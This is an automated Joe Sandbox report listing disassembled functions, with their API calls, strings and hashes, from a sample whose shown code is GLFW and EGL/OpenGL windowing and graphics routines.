Function 12762C40 Relevance: .6, Instructions: 622COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1833443656.000000001275E000.00000004.00001000.00020000.00000000.sdmp, Offset: 1275E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_1275e000_gFCeeWNTvZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59e993f81f42dfd284a4e22e36e2d5c1acba2f4610dc78872d8d20d2a385fc86
Instruction ID: 0e953b33a256018db5a888cb9143b4fe0a4412778393f75f523fc541ee37cc92
Opcode Fuzzy Hash: 59e993f81f42dfd284a4e22e36e2d5c1acba2f4610dc78872d8d20d2a385fc86
Instruction Fuzzy Hash: A8D1319289E7C14FE30387745C69686BFB19F23215B4A49EBC4C1CE4E3E28E4859C767

Function 12764BE8 Relevance: .4, Instructions: 438COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1833443656.000000001275E000.00000004.00001000.00020000.00000000.sdmp, Offset: 1275E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_1275e000_gFCeeWNTvZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a513d782411bcb8eecdc7498cc1b6286e5d92316dd756024d320aa475a30318
Instruction ID: 0e23f811ea2e0a345acbd449bf87283bbfd55b7525f73250e585e90274cb1556
Opcode Fuzzy Hash: 4a513d782411bcb8eecdc7498cc1b6286e5d92316dd756024d320aa475a30318
Instruction Fuzzy Hash: ADB16BA644E3C19FC7538BB49C756917FB0AE2721074F14DBC480CF5B3E219691AEB22

Function 1276A4A5 Relevance: .3, Instructions: 324COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1833443656.000000001275E000.00000004.00001000.00020000.00000000.sdmp, Offset: 1275E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_1275e000_gFCeeWNTvZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e759ee3e9735cf1be713922323b3552bcd2336ba03015ea5b99d8440e562f46
Instruction ID: d89420e1045f6f9ef6d997c696fe3282d893eda0ee5451854fef3705e2efd654
Opcode Fuzzy Hash: 3e759ee3e9735cf1be713922323b3552bcd2336ba03015ea5b99d8440e562f46
Instruction Fuzzy Hash: FD5168A240E3D05FD7038BB48C66A917FB0AE2720430F55DBC480CF5B3E219A91EE762

Function 127633D8 Relevance: .3, Instructions: 308COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1833443656.000000001275E000.00000004.00001000.00020000.00000000.sdmp, Offset: 1275E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_1275e000_gFCeeWNTvZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c675e7772fcff83fca46e9263e8b1d89e28d0ffe092a057c297ccc0aea4fcacf
Instruction ID: eed2cc20922439a7e1e3b0eab9e4208ed1b6d87852967f1fd6cae58ffdfcb8f4
Opcode Fuzzy Hash: c675e7772fcff83fca46e9263e8b1d89e28d0ffe092a057c297ccc0aea4fcacf
Instruction Fuzzy Hash: B05165A289E7C14FE7038B345C69296BF719F23211B4E44DBC481CE4E3E19E485ADB27

Function 12762F33 Relevance: .3, Instructions: 283COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1833443656.000000001275E000.00000004.00001000.00020000.00000000.sdmp, Offset: 1275E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_1275e000_gFCeeWNTvZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08072c8cb25a6dce1acd63940368b60abdb922b6c1d8b3a3ff1ecb50c00de19e
Instruction ID: c4101f36ba82db2b07d90c2d29504b685a89cc22e1d134cc4dc3356f4ca41f26
Opcode Fuzzy Hash: 08072c8cb25a6dce1acd63940368b60abdb922b6c1d8b3a3ff1ecb50c00de19e
Instruction Fuzzy Hash: 7271649289E7C14FE30387349C686867FB19F63215B4A48EBC4C1CF4A3E18E5859DB67

Function 1276707C Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1833443656.000000001275E000.00000004.00001000.00020000.00000000.sdmp, Offset: 1275E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_1275e000_gFCeeWNTvZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 572280731699b7b0fc134c8da2f52282102eabc269467eaccfcd0dcea1eb8475
Instruction ID: 5ff69c4ba6d94e43578e9143d5c19558acdc0b85f2f7387ffe0b6adf7ab0f04a
Opcode Fuzzy Hash: 572280731699b7b0fc134c8da2f52282102eabc269467eaccfcd0dcea1eb8475
Instruction Fuzzy Hash: 59419EA280E3C19FD7138BB48CA16917FF0AE2721074F55DBC480CF5B7E2196919EB62

Function 646031E0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2245ba16ef808d711bd6a6e045eb0f15c2ca42dc2bb65fd1ebafcf8c82b7c57c
Instruction ID: ca04ee5e1998c071bdabcf0428fcc9233e076c172b21be8776349022a1105c3d
Opcode Fuzzy Hash: 2245ba16ef808d711bd6a6e045eb0f15c2ca42dc2bb65fd1ebafcf8c82b7c57c
Instruction Fuzzy Hash: 9CD09E742013098BFB098F5ACA61B667BA9BF55B11F14C058DC244F741D775E581CB50

Function 646021F7 Relevance: 66.7, APIs: 18, Strings: 20, Instructions: 234
libraryloaderstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 64602235
strncmp.MSVCRT ref: 6460227B
GetProcAddress.KERNEL32 ref: 6460229E
GetProcAddress.KERNEL32 ref: 646022B7
GetProcAddress.KERNEL32(00000000,00000000), ref: 646022D0
GetProcAddress.KERNEL32 ref: 646022E9
GetProcAddress.KERNEL32 ref: 64602302
GetProcAddress.KERNEL32(00000000,00000000), ref: 6460231B
GetProcAddress.KERNEL32 ref: 64602334
GetProcAddress.KERNEL32 ref: 6460234D
GetProcAddress.KERNEL32(00000000,00000000), ref: 64602366
GetProcAddress.KERNEL32 ref: 6460237F
GetProcAddress.KERNEL32 ref: 64602398
GetProcAddress.KERNEL32(00000000,00000000), ref: 646023B1
GetProcAddress.KERNEL32 ref: 646023CA
GetProcAddress.KERNEL32 ref: 646023E3
GetProcAddress.KERNEL32(00000000,00000000), ref: 646023FC
GetProcAddress.KERNEL32 ref: 64602415

Strings

EGL_KHR_context_flush_control, xrefs: 6460257E
eglGetDisplay, xrefs: 646022C5
EGL: Failed to get EGL display: %s, xrefs: 646024EC
EGL_KHR_gl_colorspace, xrefs: 6460255C
eglSwapBuffers, xrefs: 646023BF
eglInitialize, xrefs: 646022F7
EGL_KHR_get_all_proc_addresses, xrefs: 6460256D
EGL.dll, xrefs: 64602215
EGL_KHR_create_context, xrefs: 6460253F
eglGetConfigAttrib, xrefs: 6460228B
eglQueryString, xrefs: 646023F1
libEGL.dll, xrefs: 6460220E
EGL: Failed to load required entry points, xrefs: 646024AE
$Had, xrefs: 64602525
eglMakeCurrent, xrefs: 646023A6
EGL: Library not found, xrefs: 6460224F
eglGetProcAddress, xrefs: 6460240A
EGL_KHR_create_context_no_error, xrefs: 6460254B
lib, xrefs: 64602273
eglSwapInterval, xrefs: 646023D8

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: AddressProc$LibraryLoadstrncmp
String ID: $Had$EGL.dll$EGL: Failed to get EGL display: %s$EGL: Failed to load required entry points$EGL: Library not found$EGL_KHR_context_flush_control$EGL_KHR_create_context$EGL_KHR_create_context_no_error$EGL_KHR_get_all_proc_addresses$EGL_KHR_gl_colorspace$eglGetConfigAttrib$eglGetDisplay$eglGetProcAddress$eglInitialize$eglMakeCurrent$eglQueryString$eglSwapBuffers$eglSwapInterval$lib$libEGL.dll
API String ID: 1199942516-1957977352
Opcode ID: 65ac1f7c1dfcebc60e8067b010efb93576fb72e24fb770a1897f73224c3665fd
Instruction ID: 2be6e0a8a46068feab80a72f97e01e57a28abbd52c323695223df50d50299026
Opcode Fuzzy Hash: 65ac1f7c1dfcebc60e8067b010efb93576fb72e24fb770a1897f73224c3665fd
Instruction Fuzzy Hash: 8FA12BB450E380DFDB26DF6AC6857AAFBE4FF56708F01992DE49487640D3B58880CB52

Function 64601B16 Relevance: 45.7, APIs: 11, Strings: 15, Instructions: 231
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA

glfwMakeContextCurrent.GLFW.3927611081 ref: 64601B58
strlen.MSVCRT ref: 64601BDF
strncmp.MSVCRT ref: 64601BF5
sscanf.MSVCRT ref: 64601C3A
glfwMakeContextCurrent.GLFW.3927611081 ref: 64601C72
glfwMakeContextCurrent.GLFW.3927611081 ref: 64601D19
glfwExtensionSupported.GLFW.3927611081(00000000,00000000), ref: 64601D7A
glfwExtensionSupported.GLFW.3927611081(00000000,00000000), ref: 64601DF0
glfwExtensionSupported.GLFW.3927611081 ref: 64601E09
glfwExtensionSupported.GLFW.3927611081 ref: 64601E56
glfwMakeContextCurrent.GLFW.3927611081 ref: 64601EC1

Strings

glGetIntegerv, xrefs: 64601B5D
glClear, xrefs: 64601E99
`Dad, xrefs: 64601CC4
GL_ARB_debug_output, xrefs: 64601D73
GL_ARB_compatibility, xrefs: 64601DE9
Requested OpenGL ES version %i.%i, got version %i.%i, xrefs: 64601CCE
OpenGL ES version string retrieval is broken, xrefs: 64601BC3
GL_EXT_robustness, xrefs: 64601E02
glGetString, xrefs: 64601B70
glGetStringi, xrefs: 64601CE9
%d.%d.%d, xrefs: 64601C32
GL_ARB_robustness, xrefs: 64601DF9
OpenGL version string retrieval is broken, xrefs: 64601BB6
GL_KHR_context_flush_control, xrefs: 64601E4F
Entry point retrieval is broken, xrefs: 64601D00

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: glfw$ContextCurrent.ExtensionMakeSupported.$Valuesscanfstrlenstrncmp
String ID: %d.%d.%d$Entry point retrieval is broken$GL_ARB_compatibility$GL_ARB_debug_output$GL_ARB_robustness$GL_EXT_robustness$GL_KHR_context_flush_control$OpenGL ES version string retrieval is broken$OpenGL version string retrieval is broken$Requested OpenGL ES version %i.%i, got version %i.%i$`Dad$glClear$glGetIntegerv$glGetString$glGetStringi
API String ID: 1542904474-82678582
Opcode ID: a787a4e738438449187d43e58bca56cf6b60eb0cfe523c86be57a8c95508d18e
Instruction ID: ec955498274e6c36eaf435dfca11977ababeb186932dd94b9ddddddf6aa5bf5a
Opcode Fuzzy Hash: a787a4e738438449187d43e58bca56cf6b60eb0cfe523c86be57a8c95508d18e
Instruction Fuzzy Hash: D5A115B09082059BDB099F69C2847DEBBF4FF54B0CF04C82EDC989B245D7B68581CB62

Function 646025A0 Relevance: 26.6, APIs: 6, Strings: 9, Instructions: 395
librarystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strncmp.MSVCRT ref: 64602BE0
LoadLibraryA.KERNEL32 ref: 64602C03

Strings

EGL: API not available, xrefs: 646025B5
0ad, xrefs: 64602BA4
EGL: Failed to create window surface: %s, xrefs: 64602B3D
EGL: Failed to find a suitable EGLConfig, xrefs: 6460280C
80, xrefs: 64602AE3
EGL: Failed to load client library, xrefs: 64602C25
mIad, xrefs: 64602A9F
80, xrefs: 64602AEE
lib, xrefs: 64602BD5

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: LibraryLoadstrncmp
String ID: 0ad$80$80$EGL: API not available$EGL: Failed to create window surface: %s$EGL: Failed to find a suitable EGLConfig$EGL: Failed to load client library$lib$mIad
API String ID: 2374402810-160528034
Opcode ID: cc9688509d4a1000696fc01fd3e0475209cd88f8e486569cc33c1196980ce96c
Instruction ID: 12e493b34a711624c8fe5681839838a58ab6d86c7415c144379c5bb511d2725b
Opcode Fuzzy Hash: cc9688509d4a1000696fc01fd3e0475209cd88f8e486569cc33c1196980ce96c
Instruction Fuzzy Hash: 860236B4A093048FDB59DF18D68479ABBF5EF44708F10C8AAE8899B240D775DD89CF42

Function 64609F84 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 181
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumDisplaySettingsW.USER32 ref: 64609FF5
CreateDCW.GDI32 ref: 6460A01F
GetDeviceCaps.GDI32 ref: 6460A05B
GetDeviceCaps.GDI32 ref: 6460A070
GetDeviceCaps.GDI32 ref: 6460A0AF
GetDeviceCaps.GDI32 ref: 6460A11C
DeleteDC.GDI32 ref: 6460A164
free.MSVCRT ref: 6460A186
wcscpy.MSVCRT ref: 6460A1B4
WideCharToMultiByte.KERNEL32(00000000), ref: 6460A202
wcscpy.MSVCRT ref: 6460A226
WideCharToMultiByte.KERNEL32 ref: 6460A268
EnumDisplayMonitors.USER32 ref: 6460A2B6

Strings

Z, xrefs: 6460A0FF
, xrefs: 6460A241

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: CapsDevice$ByteCharDisplayEnumMultiWidewcscpy$CreateDeleteMonitorsSettingsfree
String ID: $Z
API String ID: 2479431636-3176842942
Opcode ID: cfe3729773b3dbd56dc1b2ca8de68bb5024125fc4389523a86a23ce57ef77d73
Instruction ID: 8ed80cccbdc88c8452718737337ac4828fed65368ce2b2488aeba01ce2f50826
Opcode Fuzzy Hash: cfe3729773b3dbd56dc1b2ca8de68bb5024125fc4389523a86a23ce57ef77d73
Instruction Fuzzy Hash: B691F6B0909319DFDB24DF29C9447DABBF0FF98710F0189ADE498A7240D7749A848F82

Function 6460737C Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 208libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 6460739E
GetProcAddress.KERNEL32 ref: 646073CC
GetProcAddress.KERNEL32(00000000,00000000), ref: 646073E5
GetProcAddress.KERNEL32(00000001,00000001), ref: 646073FE
GetProcAddress.KERNEL32 ref: 64607417
GetProcAddress.KERNEL32 ref: 64607430
GetProcAddress.KERNEL32(00000000,00000000), ref: 64607449
GetProcAddress.KERNEL32(00000001,00000001), ref: 64607462
GetDC.USER32 ref: 64607476
ChoosePixelFormat.GDI32 ref: 646074A6
SetPixelFormat.GDI32(?,?), ref: 646074B9

Part of subcall function 64608298: GetLastError.KERNEL32 ref: 646082DF
Part of subcall function 64608298: FormatMessageW.KERNEL32 ref: 64608317
Part of subcall function 64608298: WideCharToMultiByte.KERNEL32 ref: 64608357

Strings

(, xrefs: 6460747F
%, xrefs: 64607492

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: AddressProc$Format$Pixel$ByteCharChooseErrorLastLibraryLoadMessageMultiWide
String ID: %$(
API String ID: 3228403986-93983813
Opcode ID: 2cae59ac8feba876b803e886025fcd6d9bcb592e6ae4c615f8b694617378db78
Instruction ID: a37b7c411e3238bfb69914b12a3eadec3a1d8eee3d0a0b02257eea71e55caaa7
Opcode Fuzzy Hash: 2cae59ac8feba876b803e886025fcd6d9bcb592e6ae4c615f8b694617378db78
Instruction Fuzzy Hash: 199128B0909394DFDB12EFAAC54466DFBF4FB46719F01A82DE48487240D7B68444CB53

Function 6460D15F Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 334COMMON

Download Yara Rule

APIs

GetPropW.USER32 ref: 6460D18E
EnableNonClientDpiScaling.USER32 ref: 6460D1DE

Part of subcall function 6460A331: calloc.MSVCRT ref: 6460A359
Part of subcall function 6460A331: EnumDisplayDevicesW.USER32 ref: 6460A3B9
Part of subcall function 6460A331: EnumDisplayDevicesW.USER32 ref: 6460A41F
Part of subcall function 6460A331: wcscmp.MSVCRT ref: 6460A469

Strings

(, xrefs: 6460DBAB
Q, xrefs: 6460D2B4

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: DevicesDisplayEnum$ClientEnablePropScalingcallocwcscmp
String ID: ($Q
API String ID: 2143186849-614157966
Opcode ID: c7f8273961d225fd38aede5d6497c9046fdab4805ab1734fc49a8b91e6c22d21
Instruction ID: 56b1b2e10414c6ed154da36c08ccab621a88ac399964cde2fba271c26f532041
Opcode Fuzzy Hash: c7f8273961d225fd38aede5d6497c9046fdab4805ab1734fc49a8b91e6c22d21
Instruction Fuzzy Hash: 07E13B70A04308CFDB18DFA9CA8469EBBF0FF55B14F00CA2AE5959B295D774A845CF42

Function 6460C9BA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 241COMMON

Download Yara Rule

APIs

GetDpiForWindow.USER32 ref: 6460CA41

Part of subcall function 6460B0A6: SetThreadExecutionState.KERNEL32(00000000), ref: 6460B0C0
Part of subcall function 6460B0A6: SystemParametersInfoW.USER32 ref: 6460B10C
Part of subcall function 6460B0A6: SystemParametersInfoW.USER32 ref: 6460B130

GetWindowLongW.USER32 ref: 6460CB3B
SetWindowLongW.USER32(00000150,00000150), ref: 6460CB6D
GetMonitorInfoW.USER32 ref: 6460CB8A
SetWindowPos.USER32 ref: 6460CCFA

Strings

(, xrefs: 6460CB1C

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: Window$Info$LongParametersSystem$ExecutionMonitorStateThread
String ID: (
API String ID: 3930307586-3887548279
Opcode ID: a0b1703c8ad3a84b37a9c2016ad01ebaa5baa3a88112c1f9bea6dd6591bf6aea
Instruction ID: ce95d183200969ec0ec3218b39cb76092ca63e45640ddd5fc6678acc3372c675
Opcode Fuzzy Hash: a0b1703c8ad3a84b37a9c2016ad01ebaa5baa3a88112c1f9bea6dd6591bf6aea
Instruction Fuzzy Hash: FAA107B0A083059FDB08EF69D98468EBBF0EF88714F10C92DE89997355D774D905CB92

Function 64608F9B Relevance: 18.1, APIs: 12, Instructions: 76COMMON

Download Yara Rule

APIs

UnregisterDeviceNotification.USER32 ref: 64608FAD
DestroyWindow.USER32(?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024,?,646030E9), ref: 64608FC0
SystemParametersInfoW.USER32 ref: 64608FEC
free.MSVCRT ref: 64608FFD
free.MSVCRT ref: 6460900A
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024), ref: 6460902A
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024), ref: 6460903D
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024), ref: 64609050
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024), ref: 64609063
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024), ref: 64609076
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024), ref: 64609089
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,64602E08,?,?,00000001,64613040,64633024), ref: 6460909C

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd

Similarity

API ID: FreeLibrary$free$DestroyDeviceInfoNotificationParametersSystemUnregisterWindow
String ID:
API String ID: 1825173338-0
Opcode ID: 2620f4bd462751bdfb449cd6c85e89dfec4eb0bc9c2ab9ee5f2462bb2a1826d7
Instruction ID: 4751eaf6b87ea121d633ef41e038374e24d4eed0c9cabd56117908b4e63011e8
Opcode Fuzzy Hash: 2620f4bd462751bdfb449cd6c85e89dfec4eb0bc9c2ab9ee5f2462bb2a1826d7
Instruction Fuzzy Hash: FA31DAB0608381DFEF15BFBACA88A1ABBE8FB15645F01A86CE495C7240DB75D540CB51

Function 646094CB Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 240COMMON

Download Yara Rule

Strings

,, xrefs: 6460955C

Memory Dump Source

Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

